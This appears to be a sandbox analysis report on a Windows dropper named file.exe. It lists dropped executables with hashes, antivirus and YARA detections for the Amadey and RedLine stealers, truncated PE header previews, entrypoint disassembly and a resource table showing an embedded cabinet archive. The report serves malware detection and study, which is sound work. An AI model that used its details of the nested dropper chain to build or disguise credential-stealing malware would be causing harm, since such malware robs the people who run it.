                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*0.Dc.Dc.Dc...c.Dc...c.Dc...c..Dc...c.Dc.Ec..Dc...c.Dc...c.Dc...c.DcRich.Dc................PE..L....G.c............................2l............@.......................... ......u.......................................,...(.......................`8...........................................................................................text............................... ..`.rdata...$.......&..................@..@.data........0......................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):742912
                                                                                                                                                                                                                                              Entropy (8bit):7.881821282534899
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:FMrUy90AVSctxTOsPliGrzNf0yCE2AZ6oSvArrngnEAHOAJRjU:ZypnKstia10y1EIri4
                                                                                                                                                                                                                                              MD5:4C0E7D70D851B36C6338565474276043
                                                                                                                                                                                                                                              SHA1:5F6D44F1580B7A035526148A072960D6E35AF5B4
                                                                                                                                                                                                                                              SHA-256:70E7633E9F57479D16939718B97721CD6EAA111B405CB595277F38DEBD1A2454
                                                                                                                                                                                                                                              SHA-512:3A674E759D3DBFCCF88123AECEADC276D9CAFE5D0BC04C10C3D2411ECFDAF2538CFF352EEF336AC3BFE5E3169C6ED8288C647F6EDA8A1F2835354409867AFEDA
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..................................n....@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............L..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):241664
                                                                                                                                                                                                                                              Entropy (8bit):6.368017511636962
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:bMwVoejm5JJw20a1bfjVEmAuVy1GNgsk8gF:bp7Za5VsuVy0NS
                                                                                                                                                                                                                                              MD5:52FCA4D08FACCBD7D3F9A487158ED24A
                                                                                                                                                                                                                                              SHA1:999297FAE9ADAACA1F2163E45AA4100EBE2A27F6
                                                                                                                                                                                                                                              SHA-256:6EF9B879049E0E8490811B7A90CCD47DE82B17BA7E9850485E035780E474FF14
                                                                                                                                                                                                                                              SHA-512:7669FCA02637A8D02B53837B0BC62025625D7615C275414412ECD0D4F0D6377C588A401E11D637ABD1B10269BA813555A6600CEBE8657EC78F104F350D4A0368
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exe, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#.*...#.....#.!...#.Rich..#.........PE..L......c.............................x............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text............................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):551936
                                                                                                                                                                                                                                              Entropy (8bit):7.816995957388884
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:pMriy90Qdl9+sLD+0sNaMQf0yCMu3ZFgSvArvXmnEAHWF:rybdbnvvme0yqzIr9
                                                                                                                                                                                                                                              MD5:57EB0A896C2D871FDCCB5F4A5765F84D
                                                                                                                                                                                                                                              SHA1:506CF538FB6946CD6DB964169BABD217AD042B6A
                                                                                                                                                                                                                                              SHA-256:102F1C44315A22855A37144BCD1018AD6ED58A35AF60E59AF16A5D779C7B5B3A
                                                                                                                                                                                                                                              SHA-512:397B16A5AB5E556CA893B9D87E129DADF98A47EC41C09CA1CFFF33417AE201F2C864DE08EA771B9A0B751C17E1040F25F4B7D292885ACC1DCD8B10CBABB9E4B7
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..................................O....@...... ...................................... ...............................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............b..............@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\IXP002.TMP\ckg5133.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):323072
                                                                                                                                                                                                                                              Entropy (8bit):7.433549473103745
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:ABMvcjvc/wBejySyrWNJ3TmN/grvArsGW2CcTg8Ua1:ABVMwBuyi7WgrvArsGWdC1H
                                                                                                                                                                                                                                              MD5:E55D7636A5E2C2F2A7ED7486C32D16D6
                                                                                                                                                                                                                                              SHA1:CD57BB8A2C7731BBA1A3EDDF5A4E8A587FE9B566
                                                                                                                                                                                                                                              SHA-256:10BC0CEA1822691D9CAB6938719DAB26187563160EDFB8F039FA08FD345E357F
                                                                                                                                                                                                                                              SHA-512:B0423F03D75F00F573189FB08B59E7B9245728FC0C294697BB755D0FC63DFAB2B9334C6B1BB61E109409B5CCE3B98C041217741CFE2C7B89E882E596842880BD
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b..............JM.......u.......u5......{..........Y....u4......u.......u......Rich....................PE..L...-..a.....................v....................@..........................0.......}..........................................d.......Pk..........................................................@E..@............................................text...V........................... ..`.data...P...........................@....wel.................v..............@....fozoba..............x..............@....kezokix.............|..............@....luwe...............................@....rsrc...Pk.......l..................@..@................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):206848
                                                                                                                                                                                                                                              Entropy (8bit):7.244357007934624
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:KJy+bnr+O175GWp1icKAArDZz4N9GhbkrNEk6+JfW0MbuDuzIb6bCiQSTTTf1lYw:KJy+bnr+Yp0yN90QEAfFME+s9i5XA
                                                                                                                                                                                                                                              MD5:169FAA6C3CA7D213D20BDC00810116B8
                                                                                                                                                                                                                                              SHA1:3A98D13983E544D66FC92F534B259260F57675C1
                                                                                                                                                                                                                                              SHA-256:E9089980DDCE441BA5A5F5CAE7D84132B2A0CCE6A41E666F8B185849B80BB951
                                                                                                                                                                                                                                              SHA-512:B1FF9E4A435C669EBB3DF27688158E14644CAD1823C92E472B1C7C35BD3AB5094B276C8230AA6335F6334BD4E1A0D131324BE143BA64BEF43A4BD7E29E62645A
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.......................................@...... ..........................................................p..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):11264
                                                                                                                                                                                                                                              Entropy (8bit):4.97029807367379
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
                                                                                                                                                                                                                                              MD5:7E93BACBBC33E6652E147E7FE07572A0
                                                                                                                                                                                                                                              SHA1:421A7167DA01C8DA4DC4D5234CA3DD84E319E762
                                                                                                                                                                                                                                              SHA-256:850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
                                                                                                                                                                                                                                              SHA-512:250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):179200
                                                                                                                                                                                                                                              Entropy (8bit):4.951855814556234
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:IxqZWPTa9ApGvgiOTcdkeZ59xhmHxNn2pU9f2MKTV/wi4lr55R9TxlnsPsUw0jOF:2qZvgiO6Jxh
                                                                                                                                                                                                                                              MD5:DD0C9E110C68CE1FA5308979EF718F7B
                                                                                                                                                                                                                                              SHA1:473DEB8069F0841D47B74B7F414DACC6F96ECA78
                                                                                                                                                                                                                                              SHA-256:DC28C9D9AB3F30222ED59F3991C5981BEC40604E725ECE488D8599EEF917A7B3
                                                                                                                                                                                                                                              SHA-512:29BD76DA816B13B31C938A3F8699D2F5942A24C9EF61FDDCAC490E0A30F82C1A4A76CA9A6866A8D2C8E57566F66B3AEA31E7F70646D3EBEF63C63A06F8FE2236
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, Author: ditekSHen
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@.................................0...O.......$............................................................................ ............... ..H............text....... ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Entropy (8bit):7.920893858456212
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                              File name:file.exe
                                                                                                                                                                                                                                              File size:969728
                                                                                                                                                                                                                                              MD5:33f01dc275ffa0c5989f8630eb4279b5
                                                                                                                                                                                                                                              SHA1:65e07e1c5d25a9d9817664a11d603dd7a5e21a6f
                                                                                                                                                                                                                                              SHA256:e8d4d6a87f54b65a7a04e7ccd0da266638f71e4c2b4d309eff8a5d79b48c058f
                                                                                                                                                                                                                                              SHA512:7949aa73b3225c7efe32675c93d1238e11614dccb585f96fe4f07d87f78974b96a62c2707549ae84c35281e427369cd59b1a5fec22137815acd3660e4835d2ed
                                                                                                                                                                                                                                              SSDEEP:12288:wMrky90eZ/G3CbsVsf39ht1TOsWUvpdyqwTKpf0CCzXQZ6iSXAryrCnWAH/AnoD/:EylhGua839h6sYRmR0CruQrGgl6M3
                                                                                                                                                                                                                                              TLSH:D2252347D6D84422E8B9737009F60BC30736BD705F34879B63C7BC9A1872AA5A67532B
                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.

                                                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                                                              Icon Hash:f8e0e4e8ecccc870

                                                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Entrypoint:0x406a60
                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                              Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                              OS Version Major:10
                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                              File Version Major:10
                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                              Subsystem Version Major:10
                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                              Import Hash:646167cce332c1c252cdcb1839e0cf48

                                                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                              call 00007FFAB869A1F5h
                                                                                                                                                                                                                                              jmp 00007FFAB8699B05h
                                                                                                                                                                                                                                              push 00000058h
                                                                                                                                                                                                                                              push 004072B8h
                                                                                                                                                                                                                                              call 00007FFAB869A297h
                                                                                                                                                                                                                                              xor ebx, ebx
                                                                                                                                                                                                                                              mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                                                              lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                              call dword ptr [0040A184h]
                                                                                                                                                                                                                                              mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                                                              mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                                                              mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                                                              mov edi, ebx
                                                                                                                                                                                                                                              mov edx, 004088ACh
                                                                                                                                                                                                                                              mov ecx, esi
                                                                                                                                                                                                                                              xor eax, eax
                                                                                                                                                                                                                                              lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                              je 00007FFAB8699B1Ah
                                                                                                                                                                                                                                              cmp eax, esi
                                                                                                                                                                                                                                              jne 00007FFAB8699B09h
                                                                                                                                                                                                                                              xor esi, esi
                                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                                              mov edi, esi
                                                                                                                                                                                                                                              jmp 00007FFAB8699B12h
                                                                                                                                                                                                                                              push 000003E8h
                                                                                                                                                                                                                                              call dword ptr [0040A188h]
                                                                                                                                                                                                                                              jmp 00007FFAB8699AD9h
                                                                                                                                                                                                                                              xor esi, esi
                                                                                                                                                                                                                                              inc esi
                                                                                                                                                                                                                                              cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                              jne 00007FFAB8699B0Ch
                                                                                                                                                                                                                                              push 0000001Fh
                                                                                                                                                                                                                                              call 00007FFAB869A02Bh
                                                                                                                                                                                                                                              pop ecx
                                                                                                                                                                                                                                              jmp 00007FFAB8699B3Ch
                                                                                                                                                                                                                                              cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                                                              jne 00007FFAB8699B2Eh
                                                                                                                                                                                                                                              mov dword ptr [004088B0h], esi
                                                                                                                                                                                                                                              push 004010C4h
                                                                                                                                                                                                                                              push 004010B8h
                                                                                                                                                                                                                                              call 00007FFAB8699C56h
                                                                                                                                                                                                                                              pop ecx
                                                                                                                                                                                                                                              pop ecx
                                                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                                                              je 00007FFAB8699B19h
                                                                                                                                                                                                                                              mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                                                              mov eax, 000000FFh
                                                                                                                                                                                                                                              jmp 00007FFAB8699C39h
                                                                                                                                                                                                                                              mov dword ptr [004081E4h], esi
                                                                                                                                                                                                                                              cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                              jne 00007FFAB8699B1Dh
                                                                                                                                                                                                                                              push 004010B4h
                                                                                                                                                                                                                                              push 004010ACh
                                                                                                                                                                                                                                              call 00007FFAB869A1E5h
                                                                                                                                                                                                                                              pop ecx
                                                                                                                                                                                                                                              pop ecx
                                                                                                                                                                                                                                              mov dword ptr [000088B0h], 00000000h

                                                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000xe4504.rsrc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xf10000x888.reloc
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                              Sections

                                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                              .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                              .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .rsrc0xc0000xe50000xe4600False0.9592911877394636data7.94233574337495IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                              .reloc0xf10000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                              Resources

                                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                                                              AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                                                                                                                                                                                              RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                                                                                                                                                                                              RT_DIALOG0x247400x2f2dataEnglishUnited States
                                                                                                                                                                                                                                              RT_DIALOG0x24a340x35cdataRussianRussia
                                                                                                                                                                                                                                              RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                                                                                                                                                                                                                              RT_DIALOG0x24f400x1b4dataRussianRussia
                                                                                                                                                                                                                                              RT_DIALOG0x250f40x166dataEnglishUnited States
                                                                                                                                                                                                                                              RT_DIALOG0x2525c0x168dataRussianRussia
                                                                                                                                                                                                                                              RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                                                                                                                                                                                                              RT_DIALOG0x255840x1e0dataRussianRussia
                                                                                                                                                                                                                                              RT_DIALOG0x257640x130dataEnglishUnited States
                                                                                                                                                                                                                                              RT_DIALOG0x258940x150dataRussianRussia
                                                                                                                                                                                                                                              RT_DIALOG0x259e40x120dataEnglishUnited States
                                                                                                                                                                                                                                              RT_DIALOG0x25b040x122dataRussianRussia
                                                                                                                                                                                                                                              RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                                                                                                                                                                                              RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                                                                                                                                                                                                              RT_STRING0x25d3c0x520dataEnglishUnited States
                                                                                                                                                                                                                                              RT_STRING0x2625c0x52edataRussianRussia
                                                                                                                                                                                                                                              RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                                                                                                                                                                                                              RT_STRING0x26d580x592dataRussianRussia
                                                                                                                                                                                                                                              RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                                                                                                                                                                                                              RT_STRING0x2779c0x4b2dataRussianRussia
                                                                                                                                                                                                                                              RT_STRING0x27c500x44adataEnglishUnited States
                                                                                                                                                                                                                                              RT_STRING0x2809c0x43edataRussianRussia
                                                                                                                                                                                                                                              RT_STRING0x284dc0x3cedataEnglishUnited States
                                                                                                                                                                                                                                              RT_STRING0x288ac0x2fcdataRussianRussia
                                                                                                                                                                                                                                              RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                              RT_RCDATA0x28bb00xc6828Microsoft Cabinet archive data, many, 813096 bytes, 2 files, at 0x2c +A "gck46uD.exe" +A "fcC6215.exe", ID 1810, number 1, 31 datablocks, 0x1503 compressionEnglishUnited States
                                                                                                                                                                                                                                              RT_RCDATA0xef3d80x4dataEnglishUnited States
                                                                                                                                                                                                                                              RT_RCDATA0xef3dc0x24dataEnglishUnited States
                                                                                                                                                                                                                                              RT_RCDATA0xef4000x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                              RT_RCDATA0xef4080x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                                                              RT_RCDATA0xef4100x4dataEnglishUnited States
                                                                                                                                                                                                                                              RT_RCDATA0xef4140xcdataEnglishUnited States
